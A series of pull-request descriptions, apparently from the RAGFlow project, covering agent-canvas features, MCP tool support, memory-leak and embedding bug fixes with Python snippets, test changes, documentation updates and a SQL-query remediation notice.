- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where variables were not displayed in the switch
operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses an incompatibility issue with the Google Chat API by
correcting the message content format in the `GoogleChat` class.
Previously, the content was directly assigned to the "parts" field,
which did not align with the API's expected format. This change ensures
that messages are properly formatted with a "text" key within a
dictionary, as required by the API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add agent advanced settings form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: the output log is incorrect
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: liang <xiaofeng.liang@landstech.com.cn>
### What problem does this PR solve?
Add file management HTTP_API for operating files
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR enables the `Form` component within the `GoogleModal` to
directly access and manipulate the form state by passing the form
instance from the parent component. This enhances form control and data
manipulation capabilities within the modal, improving the component's
functionality and integration with the parent form.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: In a dialog message, users can enter different types of data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Switching threading.Lock() to asyncio.Lock(), since threading.Lock() is
blocking.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Fixed the issue that the top toolbar disappears when opening the
agent operator form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Support GiteeAI model #1853
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allow users to enter text in the middle of a chat #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the begin operator parameters could not be
submitted during debugging #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display sub-agents in agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the prompt menu content was hidden #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allow users to choose which MCP tools are enabled.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses critical memory leaks in the task executor's image
processing pipeline. The current implementation fails to properly
dispose of PIL Image objects and BytesIO buffers during chunk
processing, leading to progressive memory accumulation that can cause
the task executor to consume excessive memory over time.
### Background context
- The `upload_to_minio` function processes images from document chunks
and converts them to JPEG format for storage.
- PIL Image objects hold significant memory resources that must be
explicitly closed to prevent memory leaks.
- BytesIO objects also consume memory and should be properly disposed of
after use.
- In high-throughput scenarios with many image-containing documents,
these memory leaks can lead to out-of-memory errors and degraded
performance.
### Specific issues fixed
- PIL Image objects were not being explicitly closed after processing.
- BytesIO buffers lacked proper cleanup in all code paths.
- Converted images (RGBA/P to RGB) were not disposing of the original
image object.
- Memory references to large image data were not being cleared promptly.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Performance Improvement
### Changes made
- Added explicit `d["image"].close()` calls after image processing
operations.
- Implemented proper cleanup of converted images when changing formats
from RGBA/P to RGB.
- Enhanced BytesIO cleanup with `try/finally` blocks to ensure disposal
in all code paths.
- Added explicit `del d["image"]` to clear memory references after
processing.
This fix ensures stable memory usage during long-running document
processing tasks and prevents potential out-of-memory conditions in
production environments.
### What problem does this PR solve?
improve the logic to check cancel
### Type of change
- [x] Refactoring
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
stack:
```
2025-06-26 17:22:24,739 ERROR 1609 list index out of range
Traceback (most recent call last):
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
rv = self.dispatch_request()
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
File "/ragflow/api/utils/api_utils.py", line 298, in decorated_function
return func(*args, **kwargs)
File "/ragflow/api/apps/sdk/session.py", line 472, in list_session
print(conv["reference"][message_num])
IndexError: list index out of range
```

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add StringTransform operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
In web folder's prompt-editor component, when entering content for the
first time, the cursor position is abnormal and it will automatically
wrap
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: leonlai <owllai123456>
### What problem does this PR solve?
Fix chunk number error after re-parsing. #8503.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the output variable type selected by the loop operator
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Include optional `tag_feas` field if present in request
- Add input validation for `important_kwd` and `question_kwd` to ensure
they are lists
- #8462
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Customize the output variable name of the loop operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add UserFillUpForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add MCP dashboard functionalities list_tools and test_tool.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses an issue in the presentation parser where the
`layout_recognize` configuration was incorrectly retrieved from
`kwargs.get("layout_recognize", "DeepDOC")`. Instead, it should be
sourced from the `parser_config` parameter, specifically
`parser_config.get("layout_recognize", "DeepDOC")`.
This mismatch could cause the parser to default to the "DeepDOC" layout
recognizer, ignoring any alternative recognition method specified in the
parser configuration. As a result, PDF document parsing might use an
incorrect recognition engine.
The fix ensures the presentation parser consistently uses the
`layout_recognize` setting from `parser_config`, aligning with the
configuration access patterns used elsewhere in the codebase.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow operators inside the loop operator to reference the output
parameters of external operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add retrieval tool #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR adds fields to the `Chunk` class to store retrieval results like
similarity scores, term similarity, vector similarity, positions, and
document type. This allows the chunk object to hold all the information
needed when returning search results from the vector database.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Previous:
- Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI'
- Did not respect user-configured default embedding_model
Now:
- Correctly prioritizes user-configured default embedding_model
Other:
- Make embedding_model optional in CreateDatasetReq with proper None
handling
- Add default embedding model fallback in dataset update when empty
- Enhance validation utils to handle None values and string
normalization
- Update SDK default embedding model to None to match API changes
- Adjust related test cases to reflect new validation rules
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
[https://github.com/infiniflow/ragflow/issues/8324](url)
docker image version: v0.19.1
The `_clean_conf` function was not implemented in the `_chat` and
`chat_streamly` methods of the `GeminiChat` class, causing the error
"Unknown field for GenerationConfig: max_tokens" when the default LLM
config includes the "max_tokens" parameter.
**Buggy Code(ragflow/rag/llm/chat_model.py)**
```python
class GeminiChat(Base):
def __init__(self, key, model_name, base_url=None, **kwargs):
super().__init__(key, model_name, base_url=base_url, **kwargs)
from google.generativeai import GenerativeModel, client
client.configure(api_key=key)
_client = client.get_default_generative_client()
self.model_name = "models/" + model_name
self.model = GenerativeModel(model_name=self.model_name)
self.model._client = _client
def _clean_conf(self, gen_conf):
for k in list(gen_conf.keys()):
if k not in ["temperature", "top_p"]:
del gen_conf[k]
return gen_conf
def _chat(self, history, gen_conf):
from google.generativeai.types import content_types
system = history[0]["content"] if history and history[0]["role"] == "system" else ""
hist = []
for item in history:
if item["role"] == "system":
continue
hist.append(deepcopy(item))
item = hist[-1]
if "role" in item and item["role"] == "assistant":
item["role"] = "model"
if "role" in item and item["role"] == "system":
item["role"] = "user"
if "content" in item:
item["parts"] = item.pop("content")
if system:
self.model._system_instruction = content_types.to_content(system)
response = self.model.generate_content(hist, generation_config=gen_conf)
ans = response.text
return ans, response.usage_metadata.total_token_count
def chat_streamly(self, system, history, gen_conf):
from google.generativeai.types import content_types
if system:
self.model._system_instruction = content_types.to_content(system)
#❌_clean_conf was not implemented
for k in list(gen_conf.keys()):
if k not in ["temperature", "top_p", "max_tokens"]:
del gen_conf[k]
for item in history:
if "role" in item and item["role"] == "assistant":
item["role"] = "model"
if "content" in item:
item["parts"] = item.pop("content")
ans = ""
try:
response = self.model.generate_content(history, generation_config=gen_conf, stream=True)
for resp in response:
ans = resp.text
yield ans
yield response._chunks[-1].usage_metadata.total_token_count
except Exception as e:
yield ans + "\n**ERROR**: " + str(e)
yield 0
```
**Implement the _clean_conf function**
```python
class GeminiChat(Base):
def __init__(self, key, model_name, base_url=None, **kwargs):
super().__init__(key, model_name, base_url=base_url, **kwargs)
from google.generativeai import GenerativeModel, client
client.configure(api_key=key)
_client = client.get_default_generative_client()
self.model_name = "models/" + model_name
self.model = GenerativeModel(model_name=self.model_name)
self.model._client = _client
def _clean_conf(self, gen_conf):
for k in list(gen_conf.keys()):
if k not in ["temperature", "top_p"]:
del gen_conf[k]
return gen_conf
def _chat(self, history, gen_conf):
from google.generativeai.types import content_types
#✅ implement _clean_conf to remove the wrong parameters
gen_conf = self._clean_conf(gen_conf)
system = history[0]["content"] if history and history[0]["role"] == "system" else ""
hist = []
for item in history:
if item["role"] == "system":
continue
hist.append(deepcopy(item))
item = hist[-1]
if "role" in item and item["role"] == "assistant":
item["role"] = "model"
if "role" in item and item["role"] == "system":
item["role"] = "user"
if "content" in item:
item["parts"] = item.pop("content")
if system:
self.model._system_instruction = content_types.to_content(system)
response = self.model.generate_content(hist, generation_config=gen_conf)
ans = response.text
return ans, response.usage_metadata.total_token_count
def chat_streamly(self, system, history, gen_conf):
from google.generativeai.types import content_types
#✅ implement _clean_conf to remove the wrong parameters
gen_conf = self._clean_conf(gen_conf)
if system:
self.model._system_instruction = content_types.to_content(system)
#✅Removed duplicate parameter filtering logic "for k in list(gen_conf.keys()):"
for item in history:
if "role" in item and item["role"] == "assistant":
item["role"] = "model"
if "content" in item:
item["parts"] = item.pop("content")
ans = ""
try:
response = self.model.generate_content(history, generation_config=gen_conf, stream=True)
for resp in response:
ans = resp.text
yield ans
yield response._chunks[-1].usage_metadata.total_token_count
except Exception as e:
yield ans + "\n**ERROR**: " + str(e)
yield 0
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Filter the query variable drop-down box options by type #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR fixes a typo in the variable name `succesfulFilenames`,
correcting it to `successfulFilenames`. This ensures consistency and
avoids potential errors due to the misspelled variable.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: when using external components, it is impossible to specify the
port, because the variables in the `docker/.env` variable were not
referenced by `docker/service_conf.yaml.template`.
382d2d0373/docker/.env (L85)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Insert the node data of the bottom subagent into the tool array of
the head agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Using the QA chunking method with a large PDF (e.g., 300+ pages) may
lead to OOM in the ragflow-worker module.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add MCP treamable-http transport.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8466
I go through the codes, current logic:
When do_handle_task raises an exception, handle_task will set the
progress, but for some cases do_handle_task internal will just return
but not set the right progress, at this cases the redis stream will been
acked but the task is running.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add MCP server dashboard operations.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR will fix the #8271 by extending int type to float type when
there is any value out of long type range in a column.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add IterationNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Saving an RGBA image directly as JPEG will cause an error. If the image
is in RGBA mode, convert it to RGB mode before saving it in JPG format.
### What problem does this PR solve?
During document parsing in the knowledge base, we occasionally encounter
the error 'cannot write mode RGBA as JPEG.' This occurs because images
in RGBA mode cannot be directly saved as JPEG. They must be converted
first before saving.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add new test suite for document app with
create/list/parse/upload/remove tests
- Update API URLs to use version variable from config in HTTP and web
API tests
### Type of change
- [x] Add test cases
### What problem does this PR solve?
before refactor
1. create file record
2. Add to blob
if have some execption at 2 the system db will have a file record but
not have related blob, which will introduce some bug.
after refactor
1. add to blob
2. create file record.
if 1 success but 2 failed just have a dirty blob in blob system, user
will not feel that
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Delete the agent and tool nodes downstream of the agent node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
image_version: v0.19.1
This PR fixes a bug in the HuggingFaceEmBedding API method that was
causing AssertionError: assert len(vects) == len(docs) during the
document embedding process.
#### Problem
The HuggingFaceEmbed.encode() method had an early return statement
inside the for loop, causing it to return after processing only the
first text input instead of processing all texts in the input list.
**Error Messenge**
```python
AssertionError: assert len(vects) == len(docs) # input chunks != embedded vectors from embedding api
File "/ragflow/rag/svr/task_executor.py", line 442, in embedding
```
**Buggy code(/ragflow/rag/llm/embedding_model.py)**
```python
class HuggingFaceEmbed(Base):
def __init__(self, key, model_name, base_url=None):
if not model_name:
raise ValueError("Model name cannot be None")
self.key = key
self.model_name = model_name.split("___")[0]
self.base_url = base_url or "http://127.0.0.1:8080"
def encode(self, texts: list):
embeddings = []
for text in texts:
response = requests.post(...)
if response.status_code == 200:
try:
embedding = response.json()
embeddings.append(embedding[0])
# ❌ Early return
return np.array(embeddings), sum([num_tokens_from_string(text) for text in texts])
except Exception as _e:
log_exception(_e, response)
else:
raise Exception(...)
```
**Fixed Code(I just Rollback this function to the v0.19.0 version)**
```python
Class HuggingFaceEmbed(Base):
def __init__(self, key, model_name, base_url=None):
if not model_name:
raise ValueError("Model name cannot be None")
self.key = key
self.model_name = model_name.split("___")[0]
self.base_url = base_url or "http://127.0.0.1:8080"
def encode(self, texts: list):
embeddings = []
for text in texts:
response = requests.post(...)
if response.status_code == 200:
embedding = response.json()
embeddings.append(embedding[0]) # ✅ Only append, no return
else:
raise Exception(...)
return np.array(embeddings), sum([num_tokens_from_string(text) for text in texts]) # ✅ Return after processing all
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use the message_id returned by the interface as the id of the
reply message #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This is a cherry-pick from #7781 as requested.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Update .env ,Defaults to the v0.19.1-slim edition
### Type of change
- [x] Other (please describe): Update .env ,Defaults to the
v0.19.1-slim edition
### What problem does this PR solve?
- Simplify AzureChat constructor by passing base_url directly
- Clean up spacing and formatting in chat_model.py
- Remove redundant parentheses and improve code consistency
- #8423
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change: Documentation Update/Refactoring
#### Summary
Adds HTTPS/SSL configuration guide/example to enable secure RAGFlow
deployments with proper certificate management.
#### Changes
- New HTTPS Setup Section: Step-by-step guide for SSL certificate
configuration
- Let's Encrypt Integration: Complete Certbot setup instructions
- Docker Configuration: Volume mapping examples for certificates
#### Key Features
- Prerequisites checklist
- Docker Compose configuration examples
- Support for both Let's Encrypt and existing certificates
#### Files Modified
- `README.md`
- `ragflow.https.conf` (new file)
### What problem does this PR solve?
Feat: The delete button is displayed only when the cursor is hovered
over the connection line #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** Detected possible formatted SQL query. Use
parameterized queries instead.
- **Rule ID:**
python.lang.security.audit.formatted-sql-query.formatted-sql-query
- **Severity:** HIGH
- **File:** rag/utils/opendal_conn.py
- **Lines Affected:** 98 - 98
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `rag/utils/opendal_conn.py` to resolve the
identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
### What problem does this PR solve?
Feat: Solved the conflict between the Handle click and drag events of
the canvas node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#8391#8404
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add Tavily operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where tag content would overflow the container
#8392
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Improve the tavily form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix code debug may corrupt by history answer.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add curl example for interacting with the RAGFlow MCP server. Special
thanks to @writinwaters for his expert refinement.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <cai.keith@gmail.com>
### What problem does this PR solve?
Feat: Synchronize the data of the tavily form to the canvas node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Deleting the last tool of the agent will delete the tool node
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Save the agent tool data to the node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update Docker image version badges and references from v0.19.0 to
v0.19.1
- Modify version mentions in all localized README files (id, ja, ko,
pt_br, tzh, zh)
- Update version in docker/README.md and related documentation files
- Includes updates to Helm values and Python SDK dependencies
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Correct boolean parsing for 'desc' parameter in document_app.py to
properly handle string values
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes a minor grammar issue in a user-facing error message. The original
message said "large than" instead of the correct comparative form
"larger than". Just a quick fix I noticed while reading the code.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the initial value of the slice method was not
displayed in the dialog box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. rename var
2. update if statement
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add a tool operator node from the agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix illegal variable name in Jinja2. #8316.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix sandbox sandalone context error. #8307.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add tool nodes and tool drop-down menu #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add child nodes and their connecting lines by clicking #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Highlight current language in README badges by changing color for
Traditional and Simplified Chinese
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Replace hardcoded 255-byte file name length checks with
FILE_NAME_LEN_LIMIT constant
- Update error messages to show the actual limit value
- #8290
### Type of change
- [x] Refactoring
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
- Add validation for empty filenames in document_app.py and trim
whitespace
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add a child operator node by clicking the operator node anchor
point #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the anchor point positioning of the classification operator
node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update readme
### Type of change
- [x] Documentation Update
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
- Add filename length validation (<=255 bytes) for document
upload/rename in both HTTP and SDK APIs
- Update error messages for consistency
- Fix comparison operator in SDK from '>=' to '>' for filename length
check
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use the node ID as the key to destroy different types of form
components to switch the form values of the same type of operators
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the parameters could not be set after
switching the large model parameter template. #8282
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add documentation of authorization header for MCP server based on OAuth
2.1
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### Description
This PR introduces two new environment variables, `DOC_BULK_SIZE` and
`EMBEDDING_BATCH_SIZE`, to allow flexible tuning of batch sizes for
document parsing and embedding vectorization in RAGFlow. By making these
parameters configurable, users can optimize performance and resource
usage according to their hardware capabilities and workload
requirements.
### What problem does this PR solve?
Previously, the batch sizes for document parsing and embedding were
hardcoded, limiting the ability to adjust throughput and memory
consumption. This PR enables users to set these values via environment
variables (in `.env`, Helm chart, or directly in the deployment
environment), improving flexibility and scalability for both small and
large deployments.
- `DOC_BULK_SIZE`: Controls how many document chunks are processed in a
single batch during document parsing (default: 4).
- `EMBEDDING_BATCH_SIZE`: Controls how many text chunks are processed
in a single batch during embedding vectorization (default: 16).
This change updates the codebase, documentation, and configuration files
to reflect the new options.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
### Additional context
- Updated `.env`, `helm/values.yaml`, and documentation to describe
the new variables.
- Modified relevant code paths to use the environment variables instead
of hardcoded values.
- Users can now tune these parameters to achieve better throughput or
reduce memory usage as needed.
Before:
Default value:
<img width="643" alt="image"
src="https://github.com/user-attachments/assets/086e1173-18f3-419d-a0f5-68394f63866a"
/>
After:
10x:
<img width="777" alt="image"
src="https://github.com/user-attachments/assets/5722bbc0-0bcb-4536-b928-077031e550f1"
/>
### What problem does this PR solve?
Fix mixing different embedding models in document parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
This PR fixes two issues in the OpenDAL storage connector:
1. The `health` method was missing, which prevented health checks on
the storage backend.
3. The initialization of the `opendal.Operator` object included a
redundant scheme parameter, causing unnecessary duplication and
potential confusion.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Background
- The absence of a `health` method made it difficult to verify the
availability and reliability of the storage service.
- Initializing `opendal.Operator` with both `self._scheme` and
unpacked `**self._kwargs` could lead to errors or unexpected behavior
if the scheme was already included in the kwargs.
### What is changed and how it works?
- Adds a `health` method that writes a test file to verify storage
availability.
- Removes the duplicate scheme parameter from the `opendal.Operator`
initialization to ensure clarity and prevent conflicts.
before:
<img width="762" alt="企业微信截图_46be646f-2e99-4e5e-be67-b1483426e77c"
src="https://github.com/user-attachments/assets/acecbb8c-4810-457f-8342-6355148551ba"
/>
<img width="767" alt="image"
src="https://github.com/user-attachments/assets/147cd5a2-dde3-466b-a9c1-d1d4f0819e5d"
/>
after:
<img width="1123" alt="企业微信截图_09d62997-8908-4985-b89f-7a78b5da55ac"
src="https://github.com/user-attachments/assets/97dc88c9-0f4e-4d77-88b3-cd818e8da046"
/>
### What problem does this PR solve?
Feat: Reset the default values of large model parameters
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the style of the canvas operator node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update all test file creation functions to use English text instead of
Chinese for consistency with the project's language standards. This
includes DOCX, Excel, PPT, PDF, TXT, MD, JSON, EML, and HTML test file
generators.
### Type of change
- [x] Update test case
### What problem does this PR solve?
Progress is only updated if it's valid and not regressive.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add query references to "RewriteQuestion:AllNightsSniff" in multiple
components
- Set "selected" to false for retrieval node
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add canvas node toolbar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Implement RAGFlowWebApiAuth class for web API authentication
- Add comprehensive test cases for KB CRUD operations
- Set up common fixtures and utilities in conftest.py
- Add helper functions in common.py for web API requests
The changes establish a complete testing framework for knowledge base
management via web API endpoints.
### Type of change
- [x] Add test case
### What problem does this PR solve?
Get rid of 'RedisDB.get_unacked_iterator queue rag_flow_svr_queue_1
doesn't exist'
----
Edit: revert to original message collection logic.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
This PR resolves the inconsistency in the opendal configuration where
both `schema` and `scheme` were used as keys. The code and
configuration file now consistently use `scheme`, which helps prevent
configuration errors and runtime issues. This change improves code
clarity and maintainability.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Additional context
- Updated both `conf/service_conf.yaml` and
`rag/utils/opendal_conn.py` to use `scheme` instead of `schema`
- No breaking changes to other configuration fields
### What problem does this PR solve?
Fix the restriction of forcing similarity_threshold=0 and page_size=30
when doc_ids is not empty
#8228
---------
Co-authored-by: shiqing.wusq <shiqing.wusq@dtzhejiang.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
The issue of reporting the 「Can't inference the where the component
input is. Please identify whose output is this component's input」error
when creating an Agent using the Customer service template has been
resolved.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change allocate_container_blocking Calculate Time by async time
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Connect conditional operators to other operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Fix boolean parsing for 'desc' parameter in kb_app.py to properly
handle string values
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR investigates the cause of #7957.
TL;DR: Incorrect similarity calculations lead to too many candidates.
Since candidate selection involves interaction with the LLM, this causes
significant delays in the program.
What this PR does:
1. **Fix similarity calculation**:
When processing a 64 pages government document, the corrected similarity
calculation reduces the number of candidates from over 100,000 to around
16,000. With a default batch size of 100 pairs per LLM call, this fix
reduces unnecessary LLM interactions from over 1,000 calls to around
160, a roughly 10x improvement.
2. **Add concurrency and timeout limits**:
Up to 5 entity types are processed in "parallel", each with a 180-second
timeout. These limits may be configurable in future updates.
3. **Improve logging**:
The candidate resolution process now reports progress in real time.
4. **Mitigates potential concurrency risks**
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
- Move common constants (HOST_ADDRESS, INVALID_API_TOKEN, etc.) to
configs.py
- Update test imports to use centralized configs
- Clean up duplicate constant definitions across test files
This improves maintainability by centralizing configuration.
### Type of change
- [x] Refactoring test case
### What problem does this PR solve?
- Fix test assertions in test_delete_chunks.py to expect empty results
after deletion
Action 7619
### Type of change
- [x] Bug Fix test cases
### What problem does this PR solve?
Feat: Display the connection lines between multiple conditions of the
conditional operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq
- Add pagerank update logic in dataset update endpoint
- Update API documentation to reflect changes
- Modify related test cases and SDK references
#8208
This change makes pagerank a mutable property that can only be set after
dataset creation, and only when using elasticsearch as the doc engine.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Validate that pagerank updates are only allowed when using elasticsearch
as the document engine. Return an error if pagerank is set while using a
different doc engine, preventing potential inconsistencies in document
scoring.
#8208
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8157
